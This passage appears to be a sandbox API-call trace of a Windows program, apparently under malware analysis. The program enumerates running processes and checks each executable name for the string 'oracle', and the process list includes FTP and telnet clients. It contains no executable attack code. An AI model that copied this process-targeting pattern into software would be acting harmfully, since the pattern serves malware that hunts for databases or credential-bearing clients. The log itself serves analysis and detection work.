(uFlags=0x40, uBytes=0xd) returned 0x35427e8 [0092.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35427e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0092.189] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0092.189] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="oracle") returned 0x0 [0092.189] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0092.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.191] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542638 [0092.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3542638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0092.191] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0092.191] StrStrIA (lpFirst="pending.exe", lpSrch="oracle") returned 0x0 [0092.191] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0092.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0092.192] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x355cc18 [0092.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x355cc18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0092.192] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0092.192] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="oracle") returned 0x0 [0092.192] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0092.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.194] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35430d8 [0092.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x35430d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0092.194] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0092.194] StrStrIA (lpFirst="swing prefer.exe", lpSrch="oracle") returned 0x0 [0092.194] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0092.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0092.195] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x355c9c0 [0092.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x355c9c0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0092.195] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0092.195] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="oracle") returned 0x0 [0092.195] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0092.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.196] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3542d98 [0092.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3542d98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0092.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0092.197] StrStrIA (lpFirst="nights-attending.exe", lpSrch="oracle") returned 0x0 [0092.197] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0092.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.198] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35426b0 [0092.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x35426b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0092.198] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0092.198] StrStrIA (lpFirst="installed.exe", lpSrch="oracle") returned 0x0 [0092.198] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0092.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0092.199] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x355c998 [0092.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x355c998, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0092.199] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0092.199] StrStrIA (lpFirst="references compounds.exe", lpSrch="oracle") returned 0x0 [0092.199] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0092.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.200] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3543178 [0092.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3543178, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0092.201] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0092.201] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="oracle") returned 0x0 [0092.201] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0092.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.202] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3543138 [0092.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3543138, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0092.202] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0092.202] StrStrIA (lpFirst="registered try.exe", lpSrch="oracle") returned 0x0 [0092.202] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0092.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.203] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355ca10 [0092.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x355ca10, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0092.203] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0092.203] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="oracle") returned 0x0 [0092.203] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0092.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.204] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542710 [0092.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3542710, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0092.205] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0092.205] StrStrIA (lpFirst="invite.exe", lpSrch="oracle") returned 0x0 [0092.205] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0092.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.225] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3542728 [0092.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3542728, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0092.225] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0092.225] StrStrIA (lpFirst="idol.exe", lpSrch="oracle") returned 0x0 [0092.225] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0092.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.227] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355ca38 [0092.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x355ca38, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0092.227] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0092.227] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="oracle") returned 0x0 [0092.227] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0092.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.228] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x355ca88 [0092.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x355ca88, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0092.228] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0092.228] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="oracle") returned 0x0 [0092.228] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0092.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.230] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542860 [0092.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3542860, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0092.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0092.230] StrStrIA (lpFirst="powell_jane.exe", lpSrch="oracle") returned 0x0 [0092.230] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0092.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.231] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3542e78 [0092.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3542e78, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0092.231] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0092.231] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="oracle") returned 0x0 [0092.231] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0092.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.232] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542770 [0092.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3542770, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0092.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0092.233] StrStrIA (lpFirst="gainedshape.exe", lpSrch="oracle") returned 0x0 [0092.233] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0092.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.234] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3542f98 [0092.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3542f98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0092.234] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0092.234] StrStrIA (lpFirst="opens-versions.exe", lpSrch="oracle") returned 0x0 [0092.234] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0092.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.235] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355cab0 [0092.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x355cab0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0092.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0092.235] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="oracle") returned 0x0 [0092.235] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0092.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.237] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542800 [0092.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3542800, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.238] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0092.238] StrStrIA (lpFirst="3dftp.exe", lpSrch="oracle") returned 0x0 [0092.238] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0092.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.239] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3542e58 [0092.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3542e58, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0092.239] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0092.239] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="oracle") returned 0x0 [0092.239] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0092.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.241] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35425c0 [0092.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35425c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.241] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0092.241] StrStrIA (lpFirst="alftp.exe", lpSrch="oracle") returned 0x0 [0092.241] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 